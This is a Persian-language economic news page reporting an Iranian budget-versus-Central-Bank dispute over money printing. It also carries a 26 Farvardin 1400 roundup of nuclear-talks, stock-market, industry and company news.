رئیس سازمان برنامه و بودجه درحالی بانک مرکزی را بزرگترین بدهکار دولت عنوان کرده است که رئیس کل این بانک در خصوص چاپ پول از محل تسعیر ارزهای صندوق توسعه ملی گلایه کرده بود.

همتی رئیس کل بانک مرکزی در سال گذشته به نوعی دلیل افزایش تورم را به چاپ پول از محل ارز صندوق توسعه ملی مرتبط دانسته بود.

وی گفته بود، خرید بخشی از منابع صندوق توسعه ملی جهت تامین کسری بودجه توسط بانک مرکزی که در بودجه تکلیف شده بود، به نوعی تامین کسری از محل پایه پولی بوده که این روش در کوتاه مدت به معنی استقراض از بانک مرکزی است.

این درحالی است که نیمه آذر ماه رئیس سازمان برنامه و بودجه در نشست خبری امروز خود مدعی شد که کسری بودجه فشاری بر بانک مرکزی نیاورده است و حتی رئیس کل بانک مرکزی نیز از او تشکر کرده است، اما آیا این ادعا ریشه در واقعیت دارد؟

در همین راستا روز گذشته نیز نوبخت در مجلس شورای اسلامی بر این موضع تاکید و گفته است، بخشی از کسری بودجه به خاطر سریع نبودن تبدیل منابع ارزی به ریالی است، همچنین بانک مرکزی در تبدیل ارز به ریال دچار تاخیر است و به همین دلیل در حال حاضر، این بانک بزرگ‌ترین بدهکار دولت است.

رئیس سازمان برنامه بودجه کشور در پاسخ به سوال یکی از نمایندگان مبنی بر استقراض دولت از بانک مرکزی، خاطرنشان کرد: بنابر گزارش وزیر محترم نفت پول حاصل از صادرات نفت به حساب بانک مرکزی واریز شده اما این بانک در تبدیل ارز به ریال دچار تاخیر است و به همین دلیل در حال حاضر بانک مرکزی بزرگترین بدهکار دولت است. در شرایطی که دولت اندوخته مالی دربانک مرکزی دارد چه نیاز به چاپ پول است؟ اساسا بخشی از کسری بودجه دولت به همین دلیل است که منابع ارزی سریع به منابع ریالی تبدیل نمی‌شود.

گفتنی است، رئیس کل بانک مرکزی چندی قبل گفته بود، تمام مشکلات تورمی موجود محدود به عملکرد بانک مرکزی نیست و قضاوت در خصوص عملکرد این بانک باید در چارچوب محیط اقتصاد کلان و شوک‌های وارده به اقتصاد و همچنین بر مبنای ابزارها و اختیارات و درجه استقراض بانک مرکزی باشد.

 

۲۰ : سه مصوبه جدید برای رونق بورس

حبر رسیده که سازمان بورس و اوراق بهادار سه مصوبه دیگر در راستای تقویت سمت تقاضا به تصویب رساندند؛ براین اساس مصوبه رفع مانع تراشی در انتشار اوراق، مصوبه تصویب مقررات زدایی فعالیت صندوق‌ها و حذف محدودیت‌های معاملات کارگزاران در دستور کار قرار گرفته است.

همزمان با ادامه واکنش ها در خصوص حادثه در تاسیسات هسته ای نطنز که ایران مسئولیت مستقیم آن را متوجه اسرائیل دانسته، از پنج شنبه مذاکرات وین با اعلام غنی سازی ۶۰ درصدی ایران دنبال میشود.

اخبار کلان ۲۶ فروردین ۱۴۰۰

همچنان اخبار درباره تحولات احیای برجام جدی گرفته می شود، چرا که پس از خرابکاری در مرکز تاسیسات هسته ای نطنز حالا ایران اعلام کرد مقدمات آغاز غنی‌سازی ۶۰ درصد را تکمیل کرد. آژانس انرژی اتمی هم همزمان با بازدید بازرسان سازمان انرژی اتمی از سایت هسته ای نطنز خبر داده که ایران قصد دارد ۱۰۲۴ سانتریفیوژ IR-1 به سایت هسته‌ای زیرزمینی خود اضافه کند و تقریبا مقدمات آغاز غنی‎سازی ۶۰ درصد تکمیل شده است. سخنگوی کاخ سفید در واکنش به آغاز غنی‌سازی ۶۰ درصدی در ایران اعلام کرد که این یک مسئله جدی است و دولت آمریکا آن را جدی می‌گیرد. کشورهای آلمان، فرانسه و انگلیس در بیانیه‌ای مشترک به تصمیم ایران برای آغاز غنی سازی ۶۰ درصدی واکنش نشان دادند و ابراز نگرانی کردند. نماینده روسیه در سازمان‌های بین‌المللی در وین همزمان با دیدار با هیات ایرانی در صفحه توییترش درباره افزایش سطح غنی‌سازی ایران و مذاکرات وین برای احیای توافق هسته‌ای نوشت: عجیب این که قصد ایران از فاصله گرفتن بیشتر از توافق هسته‌ای دقیقا ثابت می‌کند که احیای برجام، تنها راهکار عملی است که می‌تواند برنامه هسته‌ای ایران را به شاخص‌های توافق شده بازگرداند و از لغو تحریم‌های آمریکا اطمینان حاصل کند. علی‌اکبر صالحی، رئیس سازمان انرژی اتمی ایران امروز همچنین در خبری از اتصال کامل برق سایت هسته‌ای نطنز هم خبر داده بود.

حالا با این اتفاقات و رویدادها، با یک روز تاخیر از پنج شنبه قرار است مذاکرات پی گرفته شود؛  رهبر انقلاب در نخستین روز ماه رمضان، در یک برنامه تلویزیونی در خصوص تحولات برجام گفت که سیاست کشور در مورد مذاکرات اعلام شده است. وی تاکید کرد تشخیص مسئولان این است که بروند مذاکره کنند تا این سیاست را اعمال کنند، اما او عنوان کرده مذاکره نباید فرسایشی باشد، چون برای کشور ضرر دارد. به گفته رهبر انقلاب آمریکا نمی‎خواهد مذاکره کند که حرف حق را قبول کند، می‎خواهد در مذاکره حرف باطل را تحمیل کند. در همین حال کاظم غریب آبادی، سفیر و نماینده دائم کشورمان نزد سازمان‌های بین المللی در وین در نامه به مدیرکل آژانس بین المللی انرژی اتمی تاکید کرده، ایران طبق حقوق بین الملل نسبت به هرگونه ماجراجویی رژیم اسرائیل هشدار می‌دهد و به هرگونه تهدید یا عمل متخلفانه انجام شده توسط این رژیم، قاطعانه پاسخ خواهد داد.

کاخ سفید هم در خصوص مذاکرات پنج شنبه اعلام کرده، گفت‌وگوها با ایران از روز پنجشنبه از سر گرفته خواهد شد و تاکید کرده می‌دانیم که گفت‌وگوها با ایران روندی طولانی خواهد داشت اما این یک گام مثبت است. اتحادیه اروپا نیز در بیانیه ای اعلام کرده نشست کمیسیون مشترک برجام روز پنجشنبه در وین برگزار می‌شود. شرکت‌کنندگان به رایزنی درباره دورنمای بازگشت محتمل آمریکا به برجام ادامه می دهند.

در اخبار دیگری که در پیوند با تحولات منطقه صورت می‌گیرند، منابع عراقی گزارش دادند که پایگاه نظامیان آمریکایی در نزدیکی فرودگاه اربیل هدف حمله راکتی قرار گرفته است. چهارشنبه شب البته حسن روحانی، رئیس جمهور در گفتگوی تلفنی با رئیس جمهور عراق و ترکیه بر لزوم تسریع در اجرایی و عملیاتی شدن توافقات دو کشور و تسهیل در روابط تجاری و حمل و نقل کالا تاکید کرد.

همسو با تحولات سیاسی، در اقتصاد هم دولتی‌ها به دنبال این هستند تا قبل از انتخابات ریاست جمهوری، بورس دوباره رونق بگیرد. در این مسیر، سیاست‌گذار در پی اتخاذ تصمیمات جدیدی است؛ به طوریکه بعد از تصویب تزریق ۲۴ هزار میلیارد تومان به بورس در قالب انتشار اوراق شرکت های سرمایه گذاری و هلدینگی برای خرید سهام، حالا خبر رسیده که سازمان بورس و اوراق بهادار سه مصوبه دیگر در راستای تقویت سمت تقاضا به تصویب رساندند؛ براین اساس مصوبه رفع مانع تراشی  در انتشار اوراق، مصوبه تصویب مقررات زدایی فعالیت صندوق‌ها و حذف محدودیت‌های معاملات کارگزاران در دستور کار قرار گرفته است.

محمد حسن ابراهیمی سرو علیا، عضو هیئت مدیره سازمان بورس در توضیح یکی از این مصوبه ها گفته است: محدودیت خرید سهام تا سقف ۲۵ میلیون تومان برای اعضای هیئت مدیره، مدیرعامل و کارکنان کارگزاری و افراد تحت تکفل آنها حذف شد. مدیر نظارت بر نهادهای مالی سازمان بورس و اوراق بهادار هم از راه اندازی مرکز ارتباط نهادهای مالی خبر داد. حالا همسو با تصمیمات و اقدامات جدید سیاست‌گذار، شایعات عجیب و غریبی هم به گوش می‌رسد؛ بورس و فرابورس اما در یک اطلاعیه مشترک انتشار برخی شایعات و اکاذیب در فضای مجازی مبنی بر کسب ثروت‌های نجومی از بازار سرمایه توسط افرادی خاص را تکذیب کردند.

اخبار صنایع ۲۶ فروردین ۱۴۰۰

در مهمترین خبر مربوط به حوزه صادرات، حمید زادبوم رئیس‌کل سازمان توسعه تجارت ایران از تصویب و ابلاغ بسته جامع سیاستی برگشت ارز حاصل از صادرات سال‌های ۱۳۹۷ تا ۱۴۰۰ خبر داد.

همچنین اتاق بازرگانی ایران در گزارش ارزیابی بررسی نقاط ضعف و قوت اقتصاد ایران نوشت: اقتصاد ایران پس از اعمال تحریم‌های ثانویه ایالات متحده، به دلیل کاهش صادرات نفت و سرمایه‌گذاری تضعیف شده است. علاوه بر آن، همه‌گیری کووید-۱۹ باعث ایجاد اختلال در فعالیت‌ها شده است. در نتیجه ریال همچنان ضعیف و تورم همچنان بالا باقی خواهد ماند. چنانچه تحریم‌ها به تدریج لغو شود، رشد اقتصادی ایران در سال ۲۰۲۱ معادل ۴.۳ درصد و برای سال ۲۰۲۲ معادل ۸.۲ درصد پیش‌بینی می‌شود.

در همین حال، در سیمانی‌ها، دبیر انجمن صنفی کارفرمایان صنعت سیمان گفته است: هنوز درصد یا روش افزایش قیمت سیمان مشخص نشده است. امیدواریم در کمتر از یک ماه آینده نرخ‌گذاری مشخص شود.

در بخش پتروشیمی اما امروز (پنج شنبه) قرار است چهار طرح پتروشیمی شامل طرح استحصال اتان پالایشگاه پارسیان سپهر شهرستان مهر، طرح تفکیک اتان پالایشگاه پارسیان سپهر شهرستان عسلویه، افتتاح اولین واحد تولید کاتالیست پلی پروپیلن در شازند و اولین واحد تولید پلی اتیلن سنگین در شازند با حضور رییس جمهوری و وزیر نفت به صورت ویدئو کنفرانس افتتاح شود.

اخبار شرکت ها ۲۶ فروردین ۱۴۰۰

در خبرهای مربوط به شرکت‌ها، در مهمترین رویدادها، قرار است ۴۷٫۱ درصد سهام غیرمدیریتی بیمه آرمان (آرمان) با قیمت پایه هر سهم معادل ۹۰۰ تومان روز دوشنبه ۳۰ فروردین از طریق تابلو زرد بازار پایه فرابورس ایران، عرضه شود. همچنین گروه پتروشیمی تابان فردا از واگذاری  ۱۶ درصد سهام نفت سپاهان (شسپا) با قیمت پایه هر سهم ۲۱۴۸ تومان در روز دوشنبه ۲۷ اردیبهشت امسال خبر داد. در همین حال پذیره نویسی اوراق اجاره سهام سرمایه گذاری صباتامین (صبا) از شنبه ۲۸ فروردین تا دوشنبه ۳۰ فروردین انجام میشود؛ این بدان معناست که مجموعه شستا (صبا تامین ) و مجوز اولین اوراق ۱۰۰۰ میلیارد تومانی برای تامین مالی خرید سهام صادر شد. براین اساس خرید سهام فملی از بانی (صبا تامین) توسط نهاد واسط و اجاره به شرط تملیک آن‌ها به بانی.

بهساز کاشانه تهران (ثبهساز) از عدم حصول نتیجه از برگزاری مزایده با موضوع مزایده: مزایده فروش ۱ واحد تجاری پروژه یاقوت به دلایل عدم حصول نتیجه: فاقد متقاضی خبر داد. سرمایه گذاری توسعه ملی (وتوسم) هم از عدم حضور شرکت کننده در مزایده اخیر خود خبر داد. تاید واتر خاورمیانه (حتاید) هم اعلام کرد: به موجب عدم وجود شرکت کننده در مزایده، ۴ فروند شناور تحت مالکیت به فروش نرسید.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران